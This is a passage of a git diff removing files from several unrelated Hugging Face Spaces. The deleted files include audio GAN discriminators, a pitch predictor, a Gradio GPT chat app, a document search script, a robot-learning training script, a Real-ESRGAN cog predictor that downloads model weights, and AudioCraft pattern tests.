37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - 
padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py b/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py deleted file mode 100644 index b2c592527a5966e6f8e79e8c52dc5b414246dcc6..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/modules/F0Predictor/PMF0Predictor.py +++ /dev/null @@ -1,97 +0,0 @@ -from lib.infer_pack.modules.F0Predictor.F0Predictor import F0Predictor -import parselmouth -import numpy as np - - -class PMF0Predictor(F0Predictor): - def __init__(self, hop_length=512, f0_min=50, f0_max=1100, sampling_rate=44100): - self.hop_length = hop_length - self.f0_min = f0_min - self.f0_max = f0_max - self.sampling_rate = sampling_rate - - def interpolate_f0(self, f0): - """ - 对F0进行插值处理 - """ - - data = np.reshape(f0, (f0.size, 1)) - - vuv_vector = np.zeros((data.size, 1), dtype=np.float32) - vuv_vector[data > 0.0] = 1.0 - vuv_vector[data <= 0.0] = 0.0 - - ip_data = data - - frame_number = data.size - last_value = 0.0 - for i in range(frame_number): - if data[i] <= 0.0: - j = i + 1 - for j in range(i + 1, frame_number): - if data[j] > 0.0: - break - if j < frame_number - 1: - if last_value > 0.0: - step = (data[j] - data[i - 1]) / float(j - i) - for k in range(i, j): - ip_data[k] = data[i - 1] + step * (k - i + 1) - else: - for k in range(i, j): - ip_data[k] = data[j] - else: - for k in range(i, frame_number): - ip_data[k] = last_value - else: - ip_data[i] = data[i] # 这里可能存在一个没有必要的拷贝 - last_value = data[i] - - return ip_data[:, 0], vuv_vector[:, 0] - - def compute_f0(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0 - - def compute_f0_uv(self, wav, p_len=None): - x = wav - if p_len is None: - p_len = x.shape[0] // self.hop_length - else: - assert abs(p_len - x.shape[0] // self.hop_length) < 4, "pad length error" - 
time_step = self.hop_length / self.sampling_rate * 1000 - f0 = ( - parselmouth.Sound(x, self.sampling_rate) - .to_pitch_ac( - time_step=time_step / 1000, - voicing_threshold=0.6, - pitch_floor=self.f0_min, - pitch_ceiling=self.f0_max, - ) - .selected_array["frequency"] - ) - - pad_size = (p_len - len(f0) + 1) // 2 - if pad_size > 0 or p_len - len(f0) - pad_size > 0: - f0 = np.pad(f0, [[pad_size, p_len - len(f0) - pad_size]], mode="constant") - f0, uv = self.interpolate_f0(f0) - return f0, uv diff --git a/spaces/FathomNet/UWROV_Deepsea_Detector/README.md b/spaces/FathomNet/UWROV_Deepsea_Detector/README.md deleted file mode 100644 index 75fbdb51d23f215a6dd43489bf3da573ddb21fdd..0000000000000000000000000000000000000000 --- a/spaces/FathomNet/UWROV_Deepsea_Detector/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: UWROV Deepsea Detector -emoji: 🐠 -colorFrom: indigo -colorTo: gray -sdk: gradio -sdk_version: 3.8.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/FreeGPT/FreeGPT/app.py b/spaces/FreeGPT/FreeGPT/app.py deleted file mode 100644 index 83ec9df6fa7f825663827d8110a6cfa47076d23f..0000000000000000000000000000000000000000 --- a/spaces/FreeGPT/FreeGPT/app.py +++ /dev/null @@ -1,83 +0,0 @@ -from typing import List, Tuple, Dict, Generator -from langchain.llms import OpenAI -import gradio as gr - -model_name = "gpt-3.5-turbo" -LLM = OpenAI(model_name=model_name, temperature=0.1) - -def create_history_messages(history: List[Tuple[str, str]]) -> List[dict]: - history_messages = [{"role": "user", "content": m[0]} for m in history] - history_messages.extend([{"role": "assistant", "content": m[1]} for m in history]) - return history_messages - -def create_formatted_history(history_messages: List[dict]) -> List[Tuple[str, str]]: - formatted_history = [] - user_messages = [] - assistant_messages = [] - - for message in history_messages: - if message["role"] == "user": - user_messages.append(message["content"]) - elif message["role"] == "assistant": - assistant_messages.append(message["content"]) - - if user_messages and assistant_messages: - formatted_history.append( - ("".join(user_messages), "".join(assistant_messages)) - ) - user_messages = [] - assistant_messages = [] - - # append any remaining messages - if user_messages: - formatted_history.append(("".join(user_messages), None)) - elif assistant_messages: - formatted_history.append((None, "".join(assistant_messages))) - - return formatted_history - -def chat( - message: str, state: List[Dict[str, str]], client = LLM.client -) -> Generator[Tuple[List[Tuple[str, str]], List[Dict[str, str]]], None, None]: - history_messages = state - if history_messages == None: - history_messages = [] - history_messages.append({"role": "system", "content": "ChatDefense is available to assist you with your legal questions."}) - - history_messages.append({"role": "user", "content": message}) - # We have no content for the assistant's response yet but we will update this: - history_messages.append({"role": "assistant", "content": ""}) - - response_message = "" - - chat_generator = client.create( - messages=history_messages, stream=True, model=model_name - ) - - for chunk in chat_generator: - if "choices" in chunk: - for choice in chunk["choices"]: - if "delta" in choice and "content" in choice["delta"]: - new_token = choice["delta"]["content"] - # Add the latest token: - response_message += new_token - # Update the assistant's response in our model: - 
history_messages[-1]["content"] = response_message - - if "finish_reason" in choice and choice["finish_reason"] == "stop": - break - formatted_history = create_formatted_history(history_messages) - yield formatted_history, history_messages - -chatbot = gr.Chatbot(label="Chat").style(color_map=("yellow", "purple")) -iface = gr.Interface( - fn=chat, - inputs=[ - gr.Textbox(placeholder="Hello there 👋🏼 ", label="Message"), - "state", - ], - outputs=[chatbot, "state"], - allow_flagging="never", -) - -iface.queue().launch() \ No newline at end of file diff --git a/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py b/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py deleted file mode 100644 index 5d79839a8dd9879beedfb8658896f949dcb52832..0000000000000000000000000000000000000000 --- a/spaces/GIZ/SDSN-demo/ver0.1 scripts/search.py +++ /dev/null @@ -1,141 +0,0 @@ -import glob, os, sys; sys.path.append('../utils') - -#import needed libraries -import seaborn as sns -from pandas import DataFrame -from sentence_transformers import SentenceTransformer, CrossEncoder, util -# from keybert import KeyBERT -from transformers import pipeline -import matplotlib.pyplot as plt -import numpy as np -import streamlit as st -import pandas as pd -from rank_bm25 import BM25Okapi -from sklearn.feature_extraction import _stop_words -import string -from tqdm.autonotebook import tqdm -import numpy as np -import docx -from docx.shared import Inches -from docx.shared import Pt -from docx.enum.style import WD_STYLE_TYPE -import logging -logger = logging.getLogger(__name__) -import tempfile -import sqlite3 -import configparser - -### These are lexcial search related functions ##### - -def bm25_tokenizer(text): - tokenized_doc = [] - for token in text.lower().split(): - token = token.strip(string.punctuation) - - if len(token) > 0 and token not in _stop_words.ENGLISH_STOP_WORDS: - tokenized_doc.append(token) - return tokenized_doc - -def bm25TokenizeDoc(paraList): - tokenized_corpus = [] - ##########Commenting this for now########### will incorporate paragrpah splitting later. 
- # for passage in tqdm(paraList): - # if len(passage.split()) >256: - # # st.write("Splitting") - # temp = " ".join(passage.split()[:256]) - # tokenized_corpus.append(bm25_tokenizer(temp)) - # temp = " ".join(passage.split()[256:]) - # tokenized_corpus.append(bm25_tokenizer(temp)) - # else: - # tokenized_corpus.append(bm25_tokenizer(passage)) - ######################################################################################33333 - for passage in tqdm(paraList): - tokenized_corpus.append(bm25_tokenizer(passage)) - - return tokenized_corpus - -def lexical_search(keyword, document_bm25): - config = configparser.ConfigParser() - config.read_file(open('udfPreprocess/paramconfig.cfg')) - top_k = int(config.get('lexical_search','TOP_K')) - bm25_scores = document_bm25.get_scores(bm25_tokenizer(keyword)) - top_n = np.argpartition(bm25_scores, -top_k)[-top_k:] - bm25_hits = [{'corpus_id': idx, 'score': bm25_scores[idx]} for idx in top_n] - bm25_hits = sorted(bm25_hits, key=lambda x: x['score'], reverse=True) - return bm25_hits - -@st.cache(allow_output_mutation=True) -def load_sentenceTransformer(name): - return SentenceTransformer(name) - - -def semantic_search(keywordlist,paraList): - - ##### Sematic Search ##### - #query = "Does document contain {} issues ?".format(keyword) - config = configparser.ConfigParser() - config.read_file(open('udfPreprocess/paramconfig.cfg')) - model_name = config.get('semantic_search','MODEL_NAME') - - bi_encoder = load_sentenceTransformer(model_name) - bi_encoder.max_seq_length = int(config.get('semantic_search','MAX_SEQ_LENGTH')) #Truncate long passages to 256 tokens - top_k = int(config.get('semantic_search','TOP_K')) - document_embeddings = bi_encoder.encode(paraList, convert_to_tensor=True, show_progress_bar=False) - question_embedding = bi_encoder.encode(keywordlist, convert_to_tensor=True) - - hits = util.semantic_search(question_embedding, document_embeddings, top_k=top_k) - - return hits - -def show_results(keywordList): - document = docx.Document() - # document.add_heading('Document name:{}'.format(file_name), 2) - section = document.sections[0] - - # Calling the footer - footer = section.footer - - # Calling the paragraph already present in - # the footer section - footer_para = footer.paragraphs[0] - - font_styles = document.styles - font_charstyle = font_styles.add_style('CommentsStyle', WD_STYLE_TYPE.CHARACTER) - font_object = font_charstyle.font - font_object.size = Pt(7) - # Adding the centered zoned footer - footer_para.add_run('''\tPowered by GIZ Data and the Sustainable Development Solution Network hosted at Hugging-Face spaces: https://huggingface.co/spaces/ppsingh/streamlit_dev''', style='CommentsStyle') - document.add_heading('Your Seacrhed for {}'.format(keywordList), level=1) - for keyword in keywordList: - - st.write("Results for Query: {}".format(keyword)) - para = document.add_paragraph().add_run("Results for Query: {}".format(keyword)) - para.font.size = Pt(12) - bm25_hits, hits = search(keyword) - - st.markdown(""" - We will provide with 2 kind of results. The 'lexical search' and the semantic search. 
- """) - # In the semantic search part we provide two kind of results one with only Retriever (Bi-Encoder) and other the ReRanker (Cross Encoder) - st.markdown("Top few lexical search (BM25) hits") - document.add_paragraph("Top few lexical search (BM25) hits") - - for hit in bm25_hits[0:5]: - if hit['score'] > 0.00: - st.write("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - document.add_paragraph("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - - - - # st.table(bm25_hits[0:3]) - - st.markdown("\n-------------------------\n") - st.markdown("Top few Bi-Encoder Retrieval hits") - document.add_paragraph("\n-------------------------\n") - document.add_paragraph("Top few Bi-Encoder Retrieval hits") - - hits = sorted(hits, key=lambda x: x['score'], reverse=True) - for hit in hits[0:5]: - # if hit['score'] > 0.45: - st.write("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) - document.add_paragraph("\t Score: {:.3f}: \t{}".format(hit['score'], paraList[hit['corpus_id']].replace("\n", " "))) \ No newline at end of file diff --git a/spaces/GT4SD/PatentToolkit/README.md b/spaces/GT4SD/PatentToolkit/README.md deleted file mode 100644 index 854513ccaa55b11059022c52befe3b55c208fbca..0000000000000000000000000000000000000000 --- a/spaces/GT4SD/PatentToolkit/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: PatentToolkit -emoji: 💡 -colorFrom: green -colorTo: blue -sdk: gradio -sdk_version: 3.26.0 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh b/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh deleted file mode 100644 index 016d5ae0e8409e0db30b36c49fc745ae244a14b4..0000000000000000000000000000000000000000 --- a/spaces/Gen-Sim/Gen-Sim/scripts/traintest_scripts/train_test_single_task_indistribution.sh +++ /dev/null @@ -1,58 +0,0 @@ -#!/bin/bash - -DATA_DIR=$1 -TRAINTASK=${2-'[rainbow-stack,bowl-ball-placement]'} -STEPS=${3-'61000'} - -DISP=False - -echo "Training single-task dataset... Folder: $DATA_DIR Task $TRAINTASK" -trap "kill 0" SIGINT -# You can parallelize these depending on how much resources you have - -############################# -## Language-Conditioned Tasks -# [align-rope,assembling-kits-seq-seen-colors,assembling-kits-seq-unseen-colors,packing-shapes] - - -# TRAIN -python cliport/train.py train.task=$TRAINTASK \ - train.agent=cliport \ - train.model_task=$TRAINTASK \ - train.attn_stream_fusion_type=add \ - train.trans_stream_fusion_type=conv \ - train.lang_fusion_type=mult \ - train.n_demos=200 \ - train.n_steps=${STEPS} \ - dataset.cache=True \ - train.exp_folder=exps/exp-$TRAINTASK \ - dataset.type=single \ - train.load_from_last_ckpt=False - -# Convert Python list to Bash array -bash_array=$(python3 -c "import sys; print(' '.join((sys.argv[1])[1:-1].split(',')))" "$TRAINTASK") - -# # Convert the space-separated string to a bash array -# echo "Testing single-task dataset... 
Folder: $DATA_DIR Task $TASK" - - - -# echo "Testing $TASK" -# # TEST -# # bash scripts/generate_gpt_datasets.sh $DATA_DIR $task - -# python cliport/eval.py model_task=$TRAINTASK \ -# eval_task=$TRAINTASK \ -# agent=cliport \ -# mode=test \ -# n_demos=100 \ -# train_demos=200 \ -# checkpoint_type=test_best \ -# type=single \ -# exp_folder=exps/exp-$TRAINTASK \ -# update_results=True - -# # wait - -# python notebooks/print_results.py -r=exps/exp-$TRAINTASK/ --single -# echo "Finished Training." \ No newline at end of file diff --git a/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py b/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py deleted file mode 100644 index f314611be45d716664670fd39f90a1cfc18606e1..0000000000000000000000000000000000000000 --- a/spaces/GolDNenex/Super-Resolution-Anime-Diffusion/RealESRGANv030/cog_predict.py +++ /dev/null @@ -1,219 +0,0 @@ -# flake8: noqa -# This file is used for deploying replicate models -# running: cog predict -i img=@inputs/00017_gray.png -i version='General - v3' -i scale=2 -i face_enhance=True -i tile=0 -# push: cog push r8.im/xinntao/realesrgan - -import os - -os.system("pip install gfpgan") -os.system("python setup.py develop") - -import cv2 -import shutil -import tempfile -import torch -from basicsr.archs.rrdbnet_arch import RRDBNet -from basicsr.archs.srvgg_arch import SRVGGNetCompact - -from realesrgan.utils import RealESRGANer - -try: - from cog import BasePredictor, Input, Path - from gfpgan import GFPGANer -except Exception: - print("please install cog and realesrgan package") - - -class Predictor(BasePredictor): - def setup(self): - os.makedirs("output", exist_ok=True) - # download weights - if not os.path.exists("weights/realesr-general-x4v3.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./weights" - ) - if not os.path.exists("weights/GFPGANv1.4.pth"): - os.system( - "wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./weights" - ) - if not os.path.exists("weights/RealESRGAN_x4plus.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P ./weights" - ) - if not os.path.exists("weights/RealESRGAN_x4plus_anime_6B.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.4/RealESRGAN_x4plus_anime_6B.pth -P ./weights" - ) - if not os.path.exists("weights/realesr-animevideov3.pth"): - os.system( - "wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-animevideov3.pth -P ./weights" - ) - - def choose_model(self, scale, version, tile=0): - half = True if torch.cuda.is_available() else False - if version == "General - RealESRGANplus": - model = RRDBNet( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_block=23, - num_grow_ch=32, - scale=4, - ) - model_path = "weights/RealESRGAN_x4plus.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "General - v3": - model = SRVGGNetCompact( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_conv=32, - upscale=4, - act_type="prelu", - ) - model_path = "weights/realesr-general-x4v3.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "Anime - anime6B": - model = RRDBNet( - num_in_ch=3, - 
num_out_ch=3, - num_feat=64, - num_block=6, - num_grow_ch=32, - scale=4, - ) - model_path = "weights/RealESRGAN_x4plus_anime_6B.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - elif version == "AnimeVideo - v3": - model = SRVGGNetCompact( - num_in_ch=3, - num_out_ch=3, - num_feat=64, - num_conv=16, - upscale=4, - act_type="prelu", - ) - model_path = "weights/realesr-animevideov3.pth" - self.upsampler = RealESRGANer( - scale=4, - model_path=model_path, - model=model, - tile=tile, - tile_pad=10, - pre_pad=0, - half=half, - ) - - self.face_enhancer = GFPGANer( - model_path="weights/GFPGANv1.4.pth", - upscale=scale, - arch="clean", - channel_multiplier=2, - bg_upsampler=self.upsampler, - ) - - def predict( - self, - img: Path = Input(description="Input"), - version: str = Input( - description="RealESRGAN version. Please see [Readme] below for more descriptions", - choices=[ - "General - RealESRGANplus", - "General - v3", - "Anime - anime6B", - "AnimeVideo - v3", - ], - default="General - v3", - ), - scale: float = Input(description="Rescaling factor", default=2), - face_enhance: bool = Input( - description="Enhance faces with GFPGAN. Note that it does not work for anime images/vidoes", - default=False, - ), - tile: int = Input( - description="Tile size. Default is 0, that is no tile. When encountering the out-of-GPU-memory issue, please specify it, e.g., 400 or 200", - default=0, - ), - ) -> Path: - if tile <= 100 or tile is None: - tile = 0 - print( - f"img: {img}. version: {version}. scale: {scale}. face_enhance: {face_enhance}. tile: {tile}." - ) - try: - extension = os.path.splitext(os.path.basename(str(img)))[1] - img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) - if len(img.shape) == 3 and img.shape[2] == 4: - img_mode = "RGBA" - elif len(img.shape) == 2: - img_mode = None - img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) - else: - img_mode = None - - h, w = img.shape[0:2] - if h < 300: - img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) - - self.choose_model(scale, version, tile) - - try: - if face_enhance: - _, _, output = self.face_enhancer.enhance( - img, has_aligned=False, only_center_face=False, paste_back=True - ) - else: - output, _ = self.upsampler.enhance(img, outscale=scale) - except RuntimeError as error: - print("Error", error) - print( - 'If you encounter CUDA out of memory, try to set "tile" to a smaller size, e.g., 400.' - ) - - if img_mode == "RGBA": # RGBA images should be saved in png format - extension = "png" - # save_path = f'output/out.{extension}' - # cv2.imwrite(save_path, output) - out_path = Path(tempfile.mkdtemp()) / f"out.{extension}" - cv2.imwrite(str(out_path), output) - except Exception as error: - print("global exception: ", error) - finally: - clean_folder("output") - return out_path - - -def clean_folder(folder): - for filename in os.listdir(folder): - file_path = os.path.join(folder, filename) - try: - if os.path.isfile(file_path) or os.path.islink(file_path): - os.unlink(file_path) - elif os.path.isdir(file_path): - shutil.rmtree(file_path) - except Exception as e: - print(f"Failed to delete {file_path}. 
Reason: {e}") diff --git a/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py b/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py deleted file mode 100644 index b658f4779a369f9ec8dde692a61b7f0fe3485724..0000000000000000000000000000000000000000 --- a/spaces/GrandaddyShmax/MusicGen_Plus_hfv2/tests/modules/test_codebooks_patterns.py +++ /dev/null @@ -1,246 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import pytest -import torch - -from audiocraft.modules.codebooks_patterns import ( - DelayedPatternProvider, - ParallelPatternProvider, - Pattern, - UnrolledPatternProvider, -) - - -class TestParallelPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == s - 1 # account for the 1st empty step - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_max_delay(self, n_q: int, timesteps: int): - provider = ParallelPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == 0 - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestDelayedPatternProvider: - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [0, 1, 16, 100]) - def test_get_pattern(self, n_q: int, timesteps: int): - delays = [ - list(range(n_q)), - [0] + [1] * (n_q - 1), - [0] + [4] * (n_q - 1), - ] - for delay in delays: - provider = DelayedPatternProvider(n_q, delay) - pattern = provider.get_pattern(timesteps) - # + 1 to account for 1st step - assert len(pattern.layout) == timesteps + max(delay) + 1 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - def test_pattern_content(self, n_q: int, timesteps: int): - provider = DelayedPatternProvider(n_q) - pattern = provider.get_pattern(timesteps) - for s, v in enumerate(pattern.layout): - for i, code in enumerate(v): - assert i == code.q - assert code.t == max(0, s - code.q - 1) - - @pytest.mark.parametrize("timesteps", [8, 16, 100]) - @pytest.mark.parametrize("delay", [[0, 1, 2, 3], [0, 1, 1, 1], [0, 3, 3, 3], [0, 3]]) - def test_pattern_max_delay(self, timesteps: int, delay: list): - provider = DelayedPatternProvider(len(delay), delay) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max(delay) - assert len(pattern.valid_layout) == len(pattern.layout) - pattern.max_delay - - -class TestUnrolledPatternProvider: - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_get_pattern(self, timesteps: int, flattening: list, delays: list): - n_q = 
len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert len(pattern.layout) == provider.num_virtual_steps(timesteps) + max_delay - - @pytest.mark.parametrize("timesteps", [0, 1, 16]) - @pytest.mark.parametrize("flattening", [[0, 1, 2], [0, 1, 1]]) - @pytest.mark.parametrize("delays", [[0, 0, 0], [0, 5, 5]]) - def test_pattern_max_delay(self, timesteps: int, flattening: list, delays: list): - n_q = len(flattening) - max_delay = max(delays) - provider = UnrolledPatternProvider(n_q, flattening, delays) - pattern = provider.get_pattern(timesteps) - assert pattern.max_delay == max_delay - - -class TestPattern: - - def ref_build_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to build the sequence from the pattern without using fancy scatter.""" - bs, n_q, T = z.shape - z = z.cpu().numpy() - assert n_q == pattern.n_q - assert T <= pattern.timesteps - inp = torch.full((bs, n_q, len(pattern.layout)), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < T: - inp[:, q, s] = z[:, q, t] - return torch.from_numpy(inp) - - def ref_revert_pattern_sequence(self, z: torch.Tensor, pattern: Pattern, special_token: int): - """Reference method to revert the sequence from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, n_q, S = z.shape - assert pattern.n_q == n_q - inp = torch.full((bs, pattern.n_q, pattern.timesteps), special_token, dtype=torch.long).numpy() - inp[:] = special_token - for s, v in enumerate(pattern.layout): - for (t, q) in v: - if t < pattern.timesteps: - inp[:, q, t] = z[:, q, s] - return torch.from_numpy(inp) - - def ref_revert_pattern_logits(self, z: torch.Tensor, pattern: Pattern, special_token: float): - """Reference method to revert the logits from the pattern without using fancy scatter.""" - z = z.cpu().numpy() - bs, card, n_q, S = z.shape - assert pattern.n_q == n_q - ref_layout = pattern.layout - inp = torch.full((bs, card, pattern.n_q, pattern.timesteps), special_token, dtype=torch.float).numpy() - inp[:] = special_token - for s, v in enumerate(ref_layout[1:]): - if s < S: - for (t, q) in v: - if t < pattern.timesteps: - inp[:, :, q, t] = z[:, :, q, s] - return torch.from_numpy(inp) - - def _get_pattern_providers(self, n_q: int): - pattern_provider_1 = ParallelPatternProvider(n_q) - pattern_provider_2 = DelayedPatternProvider(n_q, list(range(n_q))) - pattern_provider_3 = DelayedPatternProvider(n_q, [0] + [1] * (n_q - 1)) - pattern_provider_4 = UnrolledPatternProvider( - n_q, flattening=list(range(n_q)), delays=[0] * n_q - ) - pattern_provider_5 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] * n_q - ) - pattern_provider_6 = UnrolledPatternProvider( - n_q, flattening=[0] + [1] * (n_q - 1), delays=[0] + [5] * (n_q - 1) - ) - return [ - pattern_provider_1, - pattern_provider_2, - pattern_provider_3, - pattern_provider_4, - pattern_provider_5, - pattern_provider_6, - ] - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_build_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # we can correctly build the sequence from the pattern - z = 
